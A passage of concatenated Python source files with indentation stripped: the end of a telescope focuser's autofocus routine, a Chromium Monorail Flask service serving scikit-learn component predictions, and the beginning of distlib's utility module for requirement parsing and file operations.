keep_files = False
if take_dark is None:
if self.autofocus_take_dark is not None:
take_dark = self.autofocus_take_dark
else:
take_dark = True
if not merit_function:
if self.autofocus_merit_function:
merit_function = self.autofocus_merit_function
else:
merit_function = 'vollath_F4'
if not merit_function_kwargs:
if self.autofocus_merit_function_kwargs:
merit_function_kwargs = self.autofocus_merit_function_kwargs
else:
merit_function_kwargs = {}
if mask_dilations is None:
if self.autofocus_mask_dilations is not None:
mask_dilations = self.autofocus_mask_dilations
else:
mask_dilations = 10
if make_plots is None:
make_plots = self.autofocus_make_plots
# Set up the focus parameters
focus_event = Event()
focus_params = {
'seconds': seconds,
'focus_range': focus_range,
'focus_step': focus_step,
'cutout_size': cutout_size,
'keep_files': keep_files,
'take_dark': take_dark,
'merit_function': merit_function,
'merit_function_kwargs': merit_function_kwargs,
'mask_dilations': mask_dilations,
'coarse': coarse,
'make_plots': make_plots,
'focus_event': focus_event,
}
focus_thread = Thread(target=self._autofocus, kwargs=focus_params)
focus_thread.start()
if blocking:
focus_event.wait()
return focus_event
def _autofocus(self,
seconds,
focus_range,
focus_step,
cutout_size,
keep_files,
take_dark,
merit_function,
merit_function_kwargs,
mask_dilations,
make_plots,
coarse,
focus_event,
*args,
**kwargs):
"""Private helper method for calling autofocus in a Thread.
See public `autofocus` for information about the parameters.
"""
focus_type = 'fine'
if coarse:
focus_type = 'coarse'
initial_focus = self.position
self.logger.debug(f"Beginning {focus_type} autofocus of {self._camera} - "
f"initial position: {initial_focus}")
# Set up paths for temporary focus files, and plots if requested.
image_dir = self.get_config('directories.images')
start_time = current_time(flatten=True)
file_path_root = os.path.join(image_dir, 'focus', self._camera.uid, start_time)
self._autofocus_error = None
dark_cutout = None
if take_dark:
dark_path = os.path.join(file_path_root, f'dark.{self._camera.file_extension}')
self.logger.debug(f'Taking dark frame {dark_path} on camera {self._camera}')
try:
dark_cutout = self._camera.get_cutout(seconds,
dark_path,
cutout_size,
keep_file=True,
dark=True)
# Mask 'saturated' with a low threshold to remove hot pixels
dark_cutout = mask_saturated(dark_cutout,
threshold=0.3,
bit_depth=self.camera.bit_depth)
except Exception as err:
self.logger.error(f"Error taking dark frame: {err!r}")
self._autofocus_error = repr(err)
focus_event.set()
raise err
# Take an image before focusing, grab a cutout from the centre and add it to the plot
initial_fn = f"{initial_focus}-{focus_type}-initial.{self._camera.file_extension}"
initial_path = os.path.join(file_path_root, initial_fn)
try:
initial_cutout = self._camera.get_cutout(seconds, initial_path, cutout_size,
keep_file=True)
initial_cutout = mask_saturated(initial_cutout, bit_depth=self.camera.bit_depth)
if dark_cutout is not None:
initial_cutout = initial_cutout.astype(np.int32) - dark_cutout
except Exception as err:
self.logger.error(f"Error taking initial image: {err!r}")
self._autofocus_error = repr(err)
focus_event.set()
raise err
# Set up encoder positions for autofocus sweep, truncating at focus travel
# limits if required.
if coarse:
focus_range = focus_range[1]
focus_step = focus_step[1]
else:
focus_range = focus_range[0]
focus_step = focus_step[0]
# Get focus steps.
focus_positions = np.arange(max(initial_focus - focus_range / 2, self.min_position),
min(initial_focus + focus_range / 2, self.max_position) + 1,
focus_step, dtype=np.int)
n_positions = len(focus_positions)
# Set up empty array holders
cutouts = np.zeros((n_positions, cutout_size, cutout_size), dtype=initial_cutout.dtype)
masks = np.empty((n_positions, cutout_size, cutout_size), dtype=np.bool)
metrics = np.empty(n_positions)
# Take and store an exposure for each focus position.
for i, position in enumerate(focus_positions):
# Move focus, updating focus_positions with actual encoder position after move.
focus_positions[i] = self.move_to(position)
focus_fn = f"{focus_positions[i]}-{i:02d}.{self._camera.file_extension}"
file_path = os.path.join(file_path_root, focus_fn)
# Take exposure.
try:
cutouts[i] = self._camera.get_cutout(seconds, file_path, cutout_size,
keep_file=keep_files)
except Exception as err:
self.logger.error(f"Error taking image {i + 1}: {err!r}")
self._autofocus_error = repr(err)
focus_event.set()
raise err
masks[i] = mask_saturated(cutouts[i], bit_depth=self.camera.bit_depth).mask
self.logger.debug(f'Making master mask with binary dilation for {self._camera}')
master_mask = masks.any(axis=0)
master_mask = binary_dilation(master_mask, iterations=mask_dilations)
# Apply the master mask and then get metrics for each frame.
for i, cutout in enumerate(cutouts):
self.logger.debug(f'Applying focus metric to cutout {i:02d}')
if dark_cutout is not None:
cutout = cutout.astype(np.float32) - dark_cutout
cutout = np.ma.array(cutout, mask=np.ma.mask_or(master_mask, np.ma.getmask(cutout)))
metrics[i] = focus_utils.focus_metric(cutout, merit_function, **merit_function_kwargs)
self.logger.debug(f'Focus metric for cutout {i:02d}: {metrics[i]}')
# Only fit a fine focus.
fitted = False
fitting_indices = [None, None]
# Find maximum metric values.
imax = metrics.argmax()
if imax == 0 or imax == (n_positions - 1):
# TODO: have this automatically switch to coarse focus mode if this happens
self.logger.warning(f"Best focus outside sweep range, stopping focus and using"
f" {focus_positions[imax]}")
best_focus = focus_positions[imax]
elif not coarse:
# Fit data around the maximum value to determine best focus position.
# Initialise models
shift = models.Shift(offset=-focus_positions[imax])
# Small initial coeffs with expected sign. Helps fitting start in the right direction.
poly = models.Polynomial1D(degree=4, c0=1, c1=0, c2=-1e-2, c3=0, c4=-1e-4,
fixed={'c0': True, 'c1': True, 'c3': True})
scale = models.Scale(factor=metrics[imax])
# https://docs.astropy.org/en/stable/modeling/compound-models.html?#model-composition
reparameterised_polynomial = shift | poly | scale
# Initialise fitter
fitter = fitting.LevMarLSQFitter()
# Select data range for fitting. Tries to use 2 points either side of max, if in range.
fitting_indices = (max(imax - 2, 0), min(imax + 2, n_positions - 1))
# Fit models to data
fit = fitter(reparameterised_polynomial,
focus_positions[fitting_indices[0]:fitting_indices[1] + 1],
metrics[fitting_indices[0]:fitting_indices[1] + 1])
# Get the encoder position of the best focus.
best_focus = np.abs(fit.offset_0)
fitted = True
# Guard against fitting failures, force best focus to stay within sweep range.
min_focus = focus_positions[0]
max_focus = focus_positions[-1]
if best_focus < min_focus:
self.logger.warning(f"Fitting failure: best focus {best_focus} below sweep limit"
f" {min_focus}")
best_focus = focus_positions[1]
if best_focus > max_focus:
self.logger.warning(f"Fitting failure: best focus {best_focus} above sweep limit"
f" {max_focus}")
best_focus = focus_positions[-2]
else:
# Coarse focus, just use max value.
best_focus = focus_positions[imax]
# Move the focuser to best focus position.
final_focus = self.move_to(best_focus)
# Get final cutout.
final_fn = f"{final_focus}-{focus_type}-final.{self._camera.file_extension}"
file_path = os.path.join(file_path_root, final_fn)
try:
final_cutout = self._camera.get_cutout(seconds, file_path, cutout_size,
keep_file=True)
final_cutout = mask_saturated(final_cutout, bit_depth=self.camera.bit_depth)
if dark_cutout is not None:
final_cutout = final_cutout.astype(np.int32) - dark_cutout
except Exception as err:
self.logger.error(f"Error taking final image: {err!r}")
self._autofocus_error = repr(err)
focus_event.set()
raise err
if make_plots:
line_fit = None
if fitted:
focus_range = np.arange(focus_positions[fitting_indices[0]],
focus_positions[fitting_indices[1]] + 1)
fit_line = fit(focus_range)
line_fit = [focus_range, fit_line]
plot_title = f'{self._camera} {focus_type} focus at {start_time}'
# Make the plots
plot_path = os.path.join(file_path_root, f'{focus_type}-focus.png')
plot_path = make_autofocus_plot(plot_path,
initial_cutout,
final_cutout,
initial_focus,
final_focus,
focus_positions,
metrics,
merit_function,
plot_title=plot_title,
line_fit=line_fit
)
self.logger.info(f"{focus_type.capitalize()} focus plot for {self._camera} written to "
f" {plot_path}")
self.logger.debug(f"Autofocus of {self._camera} complete - final focus"
f" position: {final_focus}")
if focus_event:
focus_event.set()
return initial_focus, final_focus
def _set_autofocus_parameters(self,
autofocus_range,
autofocus_step,
autofocus_seconds,
autofocus_size,
autofocus_keep_files,
autofocus_take_dark,
autofocus_merit_function,
autofocus_merit_function_kwargs,
autofocus_mask_dilations,
autofocus_make_plots):
# Moved to a separate private method to make it possible to override.
if autofocus_range:
self.autofocus_range = (int(autofocus_range[0]), int(autofocus_range[1]))
else:
self.autofocus_range = None
if autofocus_step:
self.autofocus_step = (int(autofocus_step[0]), int(autofocus_step[1]))
else:
self.autofocus_step = None
self.autofocus_seconds = autofocus_seconds
self.autofocus_size = autofocus_size
self.autofocus_keep_files = autofocus_keep_files
self.autofocus_take_dark = autofocus_take_dark
self.autofocus_merit_function = autofocus_merit_function
self.autofocus_merit_function_kwargs = autofocus_merit_function_kwargs
self.autofocus_mask_dilations = autofocus_mask_dilations
self.autofocus_make_plots = bool(autofocus_make_plots)
def _add_fits_keywords(self, header):
header.set('FOC-NAME', self.name, 'Focuser name')
header.set('FOC-MOD', self.model, 'Focuser model')
header.set('FOC-ID', self.uid, 'Focuser serial number')
header.set('FOC-POS', self.position, 'Focuser position')
return header
def __str__(self):
try:
s = "{} ({}) on {}".format(self.name, self.uid, self.port)
except Exception:
s = str(__class__)
return s
|
service.py
|
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is govered by a BSD-style
# license that can be found in the LICENSE file or at
# https://developers.google.com/open-source/licenses/bsd
"""Prediction service for Monorail.
"""
import logging
import os
import sklearn
import pickle
import json
import tempfile
import threading
import numpy as np
from googleapiclient import discovery
from googleapiclient import http
from oauth2client.client import GoogleCredentials
from flask import Flask, request, render_template
# These parameters determine the location of the model files on GCS.
#MODEL_TIME = 1473989566
MODEL_TIME = 1473288723
DIR_MODEL_TIME = 20170321
app = Flask(__name__)
# This should be set to true once the models are loaded and we're ready
# to serve requests.
ready = False
index_map, vectorizer, tfidf_transformer, clf = None, None, None, None
component_definition = None
vectorizer_dir, tfidf_transformer_dir, clf_dir= None, None, None
@app.route('/')
def text_area():
return render_template('comment.html')
@app.route('/_predict', methods=['POST'])
def predict():
text = request.form['text']
text = text.lower().strip()
counts = vectorizer.transform([text])
tfidf = tfidf_transformer.transform(counts)
predictions = clf.predict(tfidf)[0]
# Translate array of indices into acual list of components
predictions_path = []
for index in np.where(predictions)[0]:
predictions_path.append(index_map[index])
return json.dumps({'components': predictions_path})
@app.route('/_predict_dir', methods=['POST'])
def predict_dir():
predictions_path = []
dir_paths = request.form['text']
dir_paths = dir_paths.split(',')
counts_dir = vectorizer_dir.transform(dir_paths)
tfidf_dir = tfidf_transformer_dir.transform(counts_dir)
prediction_result = clf_dir.predict(tfidf_dir)
for input_i in range(0, len(prediction_result)):
tmp_prediction_index = [input_i for input_i, predict_label_j
in enumerate(prediction_result[input_i])
if predict_label_j == 1]
tmp_prediction_component = []
for tmp_index in tmp_prediction_index:
tmp_prediction_component.append(component_definition[tmp_index])
predictions_path.append(tmp_prediction_component)
return json.dumps({'components': predictions_path})
# Used by GAE Custom Flexible Runtime
@app.route('/_log', methods=['GET'])
def log():
# TODO: more detailed logging. For now we can just look at the
# GET request parameters.
return 'ok'
# Used by GAE Custom Flexible Runtime
@app.route('/_ah/start')
def start():
return 'ok'
# Used by GAE Custom Flexible Runtime
@app.route('/_ah/stop')
def stop():
return 'ok'
# Used by GAE Custom Flexible Runtime
@app.route('/_ah/health')
def health():
if ready:
return 'ok'
else:
return '', 503 # HTTP_503_SERVICE_UNAVAILABLE
# Used by GAE Custom Flexible Runtime
@app.route('/_ah/background')
def background():
return 'ok'
# CORS support.
@app.after_request
def after_request(response):
response.headers.add('Access-Control-Allow-Origin', '*')
response.headers.add('Access-Control-Allow-Headers',
'Content-Type,Authorization')
response.headers.add('Access-Control-Allow-Methods', 'GET,PUT,POST,DELETE')
return response
@app.errorhandler(500)
def server_error(e):
# Log the error and stacktrace.
logging.exception('An error occurred during a request: %s.', e)
return 'An internal error occurred.', 500
def create_service():
# Get the application default credentials. When running locally, these are
# available after running `gcloud init`. When running on compute
# engine, these are available from the environment.
credentials = GoogleCredentials.get_application_default()
# Construct the service object for interacting with the Cloud Storage API -
# the 'storage' service, at version 'v1'.
# You can browse other available api services and versions here:
# http://g.co/dev/api-client-library/python/apis/
return discovery.build('storage', 'v1', credentials=credentials)
def get_object(bucket, filename, out_file):
service = create_service()
# Use get_media instead of get to get the actual contents of the object.
# http://g.co/dev/resources/api-libraries/documentation/storage/v1/python/latest/storage_v1.objects.html#get_media
req = service.objects().get_media(bucket=bucket, object=filename)
downloader = http.MediaIoBaseDownload(out_file, req,
chunksize=100*1024*1024)
done = False
while done is False:
status, done = downloader.next_chunk()
print("Download {}%.".format(int(status.progress() * 100)))
return out_file
def get_model(bucket, filename):
print(filename)
print('Fetching object..')
# TODO: retries on errors. GCS doesn't always work.
with tempfile.NamedTemporaryFile(mode='w+b') as tmpfile:
get_object(bucket, filename, out_file=tmpfile)
tmpfile.seek(0)
model = pickle.load(tmpfile)
return model
@app.before_first_request
def load_data():
bucket_name = os.environ.get('GCLOUD_PROJECT')
global ready, index_map, vectorizer, tfidf_transformer, clf
index_map = get_model(bucket_name,
'issue_model/{}-index-map.pkl'.format(MODEL_TIME))
vectorizer = get_model(bucket_name,
'issue_model/{}-vectorizer.pkl'.format(MODEL_TIME))
tfidf_transformer = get_model(bucket_name,
'issue_model/{}-transformer.pkl'.format(
MODEL_TIME))
clf = get_model(bucket_name, 'issue_model/{}-classifier.pkl'.format(
MODEL_TIME))
# Load directory component prediction model
global ready, component_definition, vectorizer_dir
global tfidf_transformer_dir, clf_dir
component_definition = get_model(bucket_name,
'dir_model/{}-component_def.pkl'.format(
DIR_MODEL_TIME))
vectorizer_dir = get_model(bucket_name,
'dir_model/{}-vectorizer.pkl'.format(
DIR_MODEL_TIME))
tfidf_transformer_dir = get_model(bucket_name,
'dir_model/{}-transformer.pkl'.format(
DIR_MODEL_TIME))
clf_dir = get_model(bucket_name,
'dir_model/{}-classifier.pkl'.format(DIR_MODEL_TIME))
ready = True
loading_thread = threading.Thread(target=load_data)
if __name__ == '__main__':
# Start loading model data, but also start serving right away so we
# can respond to _ah/health requests with 503s rather than appearing to
# not have started at all.
loading_thread.start()
app.run(host='0.0.0.0', port='5000')
|
util.py
|
#
# Copyright (C) 2012-2017 The Python Software Foundation.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import codecs
from collections import deque
import contextlib
import csv
from glob import iglob as std_iglob
import io
import json
import logging
import os
import py_compile
import re
import socket
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
import subprocess
import sys
import tarfile
import tempfile
import textwrap
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import time
from . import DistlibException
from .compat import (
string_types,
text_type,
shutil,
raw_input,
StringIO,
cache_from_source,
urlopen,
urljoin,
httplib,
xmlrpclib,
splittype,
HTTPHandler,
BaseConfigurator,
valid_ident,
Container,
configparser,
URLError,
ZipFile,
fsdecode,
unquote,
urlparse,
)
logger = logging.getLogger(__name__)
#
# Requirement parsing code as per PEP 508
#
IDENTIFIER = re.compile(r"^([\w\.-]+)\s*")
VERSION_IDENTIFIER = re.compile(r"^([\w\.*+-]+)\s*")
COMPARE_OP = re.compile(r"^(<=?|>=?|={2,3}|[~!]=)\s*")
MARKER_OP = re.compile(r"^((<=?)|(>=?)|={2,3}|[~!]=|in|not\s+in)\s*")
OR = re.compile(r"^or\b\s*")
AND = re.compile(r"^and\b\s*")
NON_SPACE = re.compile(r"(\S+)\s*")
STRING_CHUNK = re.compile(r"([\s\w\.{}()*+#:;,/?!~`@$%^&=|<>\[\]-]+)")
def parse_marker(marker_string):
"""
Parse a marker string and return a dictionary containing a marker expression.
The dictionary will contain keys "op", "lhs" and "rhs" for non-terminals in
the expression grammar, or strings. A string contained in quotes is to be
interpreted as a literal string, and a string not contained in quotes is a
variable (such as os_name).
"""
def marker_var(remaining):
# either identifier, or literal string
m = IDENTIFIER.match(remaining)
if m:
result = m.groups()[0]
remaining = remaining[m.end() :]
elif not remaining:
raise SyntaxError("unexpected end of input")
else:
q = remaining[0]
if q not in "'\"":
raise SyntaxError("invalid expression: %s" % remaining)
oq = "'\"".replace(q, "")
remaining = remaining[1:]
parts = [q]
while remaining:
# either a string chunk, or oq, or q to terminate
if remaining[0] == q:
break
elif remaining[0] == oq:
parts.append(oq)
remaining = remaining[1:]
else:
m = STRING_CHUNK.match(remaining)
if not m:
raise SyntaxError("error in string literal: %s" % remaining)
parts.append(m.groups()[0])
remaining = remaining[m.end() :]
else:
s = "".join(parts)
raise SyntaxError("unterminated string: %s" % s)
parts.append(q)
result = "".join(parts)
remaining = remaining[1:].lstrip() # skip past closing quote
return result, remaining
def marker_expr(remaining):
if remaining and remaining[0] == "(":
result, remaining = marker(remaining[1:].lstrip())
if remaining[0] != ")":
raise SyntaxError("unterminated parenthesis: %s" % remaining)
remaining = remaining[1:].lstrip()
else:
lhs, remaining = marker_var(remaining)
while remaining:
m = MARKER_OP.match(remaining)
if not m:
break
op = m.groups()[0]
remaining = remaining[m.end() :]
rhs, remaining = marker_var(remaining)
lhs = {"op": op, "lhs": lhs, "rhs": rhs}
result = lhs
return result, remaining
def marker_and(remaining):
lhs, remaining = marker_expr(remaining)
while remaining:
m = AND.match(remaining)
if not m:
break
remaining = remaining[m.end() :]
rhs, remaining = marker_expr(remaining)
lhs = {"op": "and", "lhs": lhs, "rhs": rhs}
return lhs, remaining
def marker(remaining):
lhs, remaining = marker_and(remaining)
while remaining:
m = OR.match(remaining)
if not m:
break
remaining = remaining[m.end() :]
rhs, remaining = marker_and(remaining)
lhs = {"op": "or", "lhs": lhs, "rhs": rhs}
return lhs, remaining
return marker(marker_string)
def parse_requirement(req):
"""
Parse a requirement passed in as a string. Return a Container
whose attributes contain the various parts of the requirement.
"""
remaining = req.strip()
if not remaining or remaining.startswith("#"):
return None
m = IDENTIFIER.match(remaining)
if not m:
raise SyntaxError("name expected: %s" % remaining)
distname = m.groups()[0]
remaining = remaining[m.end() :]
extras = mark_expr = versions = uri = None
if remaining and remaining[0] == "[":
i = remaining.find("]", 1)
if i < 0:
raise SyntaxError("unterminated extra: %s" % remaining)
s = remaining[1:i]
remaining = remaining[i + 1 :].lstrip()
extras = []
while s:
m = IDENTIFIER.match(s)
if not m:
raise SyntaxError("malformed extra: %s" % s)
extras.append(m.groups()[0])
s = s[m.end() :]
if not s:
break
if s[0] != ",":
raise SyntaxError("comma expected in extras: %s" % s)
s = s[1:].lstrip()
if not extras:
extras = None
if remaining:
if remaining[0] == "@":
# it's a URI
remaining = remaining[1:].lstrip()
m = NON_SPACE.match(remaining)
if not m:
raise SyntaxError("invalid URI: %s" % remaining)
uri = m.groups()[0]
t = urlparse(uri)
# there are issues with Python and URL parsing, so this test
# is a bit crude. See bpo-20271, bpo-23505. Python doesn't
# always parse invalid URLs correctly - it should raise
# exceptions for malformed URLs
if not (t.scheme and t.netloc):
raise SyntaxError("Invalid URL: %s" % uri)
remaining = remaining[m.end() :].lstrip()
else:
def get_versions(ver_remaining):
"""
Return a list of operator, version tuples if any are
specified, else None.
"""
m = COMPARE_OP.match(ver_remaining)
versions = None
if m:
versions = []
while True:
op = m.groups()[0]
ver_remaining = ver_remaining[m.end() :]
m = VERSION_IDENTIFIER.match(ver_remaining)
if not m:
raise SyntaxError("invalid version: %s" % ver_remaining)
v = m.groups()[0]
versions.append((op, v))
ver_remaining = ver_remaining[m.end() :]
if not ver_remaining or ver_remaining[0] != ",":
break
ver_remaining = ver_remaining[1:].lstrip()
m = COMPARE_OP.match(ver_remaining)
if not m:
raise SyntaxError("invalid constraint: %s" % ver_remaining)
if not versions:
versions = None
return versions, ver_remaining
if remaining[0] != "(":
versions, remaining = get_versions(remaining)
else:
i = remaining.find(")", 1)
if i < 0:
raise SyntaxError("unterminated parenthesis: %s" % remaining)
s = remaining[1:i]
remaining = remaining[i + 1 :].lstrip()
# As a special diversion from PEP 508, allow a version number
# a.b.c in parentheses as a synonym for ~= a.b.c (because this
# is allowed in earlier PEPs)
if COMPARE_OP.match(s):
versions, _ = get_versions(s)
else:
m = VERSION_IDENTIFIER.match(s)
if not m:
raise SyntaxError("invalid constraint: %s" % s)
v = m.groups()[0]
s = s[m.end() :].lstrip()
if s:
raise SyntaxError("invalid constraint: %s" % s)
versions = [("~=", v)]
if remaining:
if remaining[0] != ";":
raise SyntaxError("invalid requirement: %s" % remaining)
remaining = remaining[1:].lstrip()
mark_expr, remaining = parse_marker(remaining)
if remaining and remaining[0] != "#":
raise SyntaxError("unexpected trailing data: %s" % remaining)
if not versions:
rs = distname
else:
rs = "%s %s" % (distname, ", ".join(["%s %s" % con for con in versions]))
return Container(
name=distname,
extras=extras,
constraints=versions,
marker=mark_expr,
url=uri,
requirement=rs,
)
def get_resources_dests(resources_root, rules):
"""Find destinations for resources files"""
def get_rel_path(root, path):
# normalizes and returns a lstripped-/-separated path
root = root.replace(os.path.sep, "/")
path = path.replace(os.path.sep, "/")
assert path.startswith(root)
return path[len(root) :].lstrip("/")
destinations = {}
for base, suffix, dest in rules:
prefix = os.path.join(resources_root, base)
for abs_base in iglob(prefix):
abs_glob = os.path.join(abs_base, suffix)
for abs_path in iglob(abs_glob):
resource_file = get_rel_path(resources_root, abs_path)
if dest is None: # remove the entry if it was here
destinations.pop(resource_file, None)
else:
rel_path = get_rel_path(abs_base, abs_path)
rel_dest = dest.replace(os.path.sep, "/").rstrip("/")
destinations[resource_file] = rel_dest + "/" + rel_path
return destinations
def in_venv():
if hasattr(sys, "real_prefix"):
# virtualenv venvs
result = True
else:
# PEP 405 venvs
result = sys.prefix != getattr(sys, "base_prefix", sys.prefix)
return result
def get_executable():
# The __PYVENV_LAUNCHER__ dance is apparently no longer needed, as
# changes to the stub launcher mean that sys.executable always points
# to the stub on OS X
# if sys.platform == 'darwin' and ('__PYVENV_LAUNCHER__'
# in os.environ):
# result = os.environ['__PYVENV_LAUNCHER__']
# else:
# result = sys.executable
# return result
result = os.path.normcase(sys.executable)
if not isinstance(result, text_type):
result = fsdecode(result)
return result
def proceed(prompt, allowed_chars, error_prompt=None, default=None):
p = prompt
while True:
s = raw_input(p)
p = prompt
if not s and default:
s = default
if s:
c = s[0].lower()
if c in allowed_chars:
break
if error_prompt:
p = "%c: %s\n%s" % (c, error_prompt, prompt)
return c
def extract_by_key(d, keys):
if isinstance(keys, string_types):
keys = keys.split()
result = {}
for key in keys:
if key in d:
result[key] = d[key]
return result
def read_exports(stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getreader("utf-8")(stream)
# Try to load as JSON, falling back on legacy format
data = stream.read()
stream = StringIO(data)
try:
jdata = json.load(stream)
result = jdata["extensions"]["python.exports"]["exports"]
for group, entries in result.items():
for k, v in entries.items():
s = "%s = %s" % (k, v)
entry = get_export_entry(s)
assert entry is not None
entries[k] = entry
return result
except Exception:
stream.seek(0, 0)
def read_stream(cp, stream):
if hasattr(cp, "read_file"):
cp.read_file(stream)
else:
cp.readfp(stream)
cp = configparser.ConfigParser()
try:
read_stream(cp, stream)
except configparser.MissingSectionHeaderError:
stream.close()
data = textwrap.dedent(data)
stream = StringIO(data)
read_stream(cp, stream)
result = {}
for key in cp.sections():
result[key] = entries = {}
for name, value in cp.items(key):
s = "%s = %s" % (name, value)
entry = get_export_entry(s)
assert entry is not None
# entry.dist = self
entries[name] = entry
return result
def write_exports(exports, stream):
if sys.version_info[0] >= 3:
# needs to be a text stream
stream = codecs.getwriter("utf-8")(stream)
cp = configparser.ConfigParser()
for k, v in exports.items():
# TODO check k, v for valid values
cp.add_section(k)
for entry in v.values():
if entry.suffix is None:
s = entry.prefix
else:
s = "%s:%s" % (entry.prefix, entry.suffix)
if entry.flags:
s = "%s [%s]" % (s, ", ".join(entry.flags))
cp.set(k, entry.name, s)
cp.write(stream)
@contextlib.contextmanager
def tempdir():
td = tempfile.mkdtemp()
try:
yield td
finally:
shutil.rmtree(td)
@contextlib.contextmanager
def chdir(d):
cwd = os.getcwd()
try:
os.chdir(d)
yield
finally:
os.chdir(cwd)
@contextlib.contextmanager
def socket_timeout(seconds=15):
cto = socket.getdefaulttimeout()
try:
socket.setdefaulttimeout(seconds)
yield
finally:
socket.setdefaulttimeout(cto)
class cached_property(object):
def __init__(self, func):
self.func = func
# for attr in ('__name__', '__module__', '__doc__'):
# setattr(self, attr, getattr(func, attr, None))
def __get__(self, obj, cls=None):
if obj is None:
return self
value = self.func(obj)
object.__setattr__(obj, self.func.__name__, value)
# obj.__dict__[self.func.__name__] = value = self.func(obj)
return value
def convert_path(pathname):
"""Return 'pathname' as a name that will work on the native filesystem.
The path is split on '/' and put back together again using the current
directory separator. Needed because filenames in the setup script are
always supplied in Unix style, and have to be converted to the local
convention before we can actually use them in the filesystem. Raises
ValueError on non-Unix-ish systems if 'pathname' either starts or
ends with a slash.
"""
if os.sep == "/":
return pathname
if not pathname:
return pathname
if pathname[0] == "/":
raise ValueError("path '%s' cannot be absolute" % pathname)
if pathname[-1] == "/":
raise ValueError("path '%s' cannot end with '/'" % pathname)
paths = pathname.split("/")
while os.curdir in paths:
paths.remove(os.curdir)
if not paths:
return os.curdir
return os.path.join(*paths)
class FileOperator(object):
def __init__(self, dry_run=False):
self.dry_run = dry_run
self.ensured = set()
self._init_record()
def _init_record(self):
self.record = False
self.files_written = set()
self.dirs_created = set()
def record_as_written(self, path):
if self.record:
self.files_written.add(path)
def newer(self, source, target):
"""Tell if the target is newer than the source.
Returns true if 'source' exists and is more recently modified than
'target', or if 'source' exists and 'target' doesn't.
Returns false if both exist and 'target' is the same age or younger
than 'source'. Raise PackagingFileError if 'source' does not exist.
Note that this test is not very accurate: files created in the same
second will have the same "age".
"""
if not os.path.exists(source):
raise DistlibException("file '%r' does not exist" % os.path.abspath(source))
if not os.path.exists(target):
return True
return os.stat(source).st_mtime > os.stat(target).st_mtime
def copy_file(self, infile, outfile, check=True):
"""Copy a file respecting dry-run and force flags.
"""
self.ensure_dir(os.path.dirname(outfile))
logger.info("Copying %s to %s", infile, outfile)
if not self.dry_run:
msg = None
if check:
if os.path.islink(outfile):
msg = "%s is a symlink" % outfile
elif os.path.exists(outfile) and not os.path.isfile(outfile):
msg = "%s is a non-regular file" % outfile
if msg:
raise ValueError(msg + " which would be overwritten")
shutil.copyfile(infile, outfile)
self.record_as_written(outfile)
def copy_stream(self, instream, outfile, encoding=None):
assert not os.path.isdir(outfile)
self.ensure_dir(os.path.dirname(outfile))
logger.info("Copying stream %s to %s", instream, outfile)
if not self.dry_run:
if encoding is None:
outstream = open(outfile, "wb")
else:
outstream = codecs.open(outfile, "w", encoding=encoding)
try:
shutil.copyfileobj(instream, outstream)
finally:
outstream.close()
self.record_as_written(outfile)
def write_binary_file(self, path, data):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, "wb") as f:
f.write(data)
self.record_as_written(path)
def write_text_file(self, path, data, encoding):
self.ensure_dir(os.path.dirname(path))
if not self.dry_run:
with open(path, "wb") as f:
f.write(data.encode(encoding))
self.record_as_written(path)
def set_mode(self, bits, mask, files):
if os.name == "posix" or (os.name == "java" and os._name == "posix"):
# Set the executable bits (owner, group, and world) on
# all the files specified.
for f in files:
if self.dry_run:
logger.info("changing mode of %s", f)
else:
mode = (os.stat(f).st_mode | bits) & mask
logger.info("changing mode of %s to %o", f, mode)
os.chmod(f, mode)
set_executable_mode = lambda s, f: s.set_mode(0o555, 0o7777, f)
def ensure_dir(self, path):
path = os.path.abspath(path)
if path not in self.ensured and not os.path.exists(path):
self.ensured.add(path)
d, f = os.path.split(path)
self.ensure_dir(d)
logger.info("Creating %s" % path)
if not self.dry_run:
os.mkdir(path)
if self.record:
self.dirs_created.add(path)
def byte_compile(self, path, optimize=False, force=False, prefix=None):
dpath = cache_from_source(path, not optimize)
logger.info("Byte-compiling %s to %s", path, dpath)
if not self.dry_run:
if force or self.newer(path, dpath):
if not prefix:
diagpath = None
else:
assert path.startswith(prefix)
diagpath = path[len(prefix) :]
py_compile.compile(path, dpath, diagpath, True) # raise error
self.record_as_written(dpath)
return dpath
def ensure_removed(self, path):
if os.path.exists(path):
if os.path.isdir(path) and not os.path.islink(path):
logger.debug("Removing directory tree at %s", path)
if not self.dry_run:
shutil.rmtree(path)
if self.record:
if path in self.dirs_created:
self.dirs_created.remove(path)
else:
if os.path.islink(path):
s = "link"
else:
s = "file"
logger.debug("Removing %s %s", s, path)
if not self.dry_run:
os.remove(path)
if self.record:
if path in self.files_written:
self.files_written.remove(path)
def is_writable(self, path):
result = False
while not result:
if os.path.exists(path):
result = os.access(path, os.W_OK)
break
parent = os.path.dirname(path)
if parent == path:
break
path = parent
return result
def commit(self):
"""
Commit recorded changes, turn off recording, return
changes.
"""
assert self.record
result = self.files_written, self.dirs_created
self._init_record()
return result
def rollback(self):
if not self.dry_run:
for f in list(self.files_written):
if os.path.exists(f):
os.remove(f)
# dirs should all be empty now, except perhaps for
# __pycache__ subdirs
# reverse so that subdirs appear before their parents
dirs = sorted(self.dirs_created, reverse=True)
for d in dirs:
flist = os.listdir(d)
if flist:
assert flist == ["__pycache__"]
sd = os.path.join(d, flist[0])
os.rmdir(sd)
os.rmdir(d) # should fail if non-empty
self._init_record()
def resolve(module_name, dotted_path):
if module_name in sys.modules:
mod = sys.modules[module_name]
else:
mod = __import__(module_name)
if dotted_path is None:
result = mod
else:
parts = dotted_path.split(".")
result = getattr(mod, parts.pop(0))
for p in parts:
result = getattr(result, p)
return result
class ExportEntry(object):
def __init__(self, name, prefix, suffix, flags):
self.name = name
self.prefix = prefix
self.suffix = suffix
self.flags = flags
@cached_property
def value(self):
return resolve(self.prefix, self.suffix)
def __repr__(self): # pragma: no cover
return "<ExportEntry %s = %s:%s %s>" % (
self.name,
self.prefix,
self.suffix,
self.flags,
)
def __eq__(self, other):
if not isinstance(other, ExportEntry):
result = False
else:
result = (
self.name == other.name
and self.prefix == other.prefix
and self.suffix == other.suffix
and self.flags == other.flags
)
return result
__hash__ = object.__hash__
ENTRY_RE = re.compile(
r"""(?P<name>(\w|[-.+])+)
\s*=\s*(?P<callable>(\w+)([:\.]\w+)*)
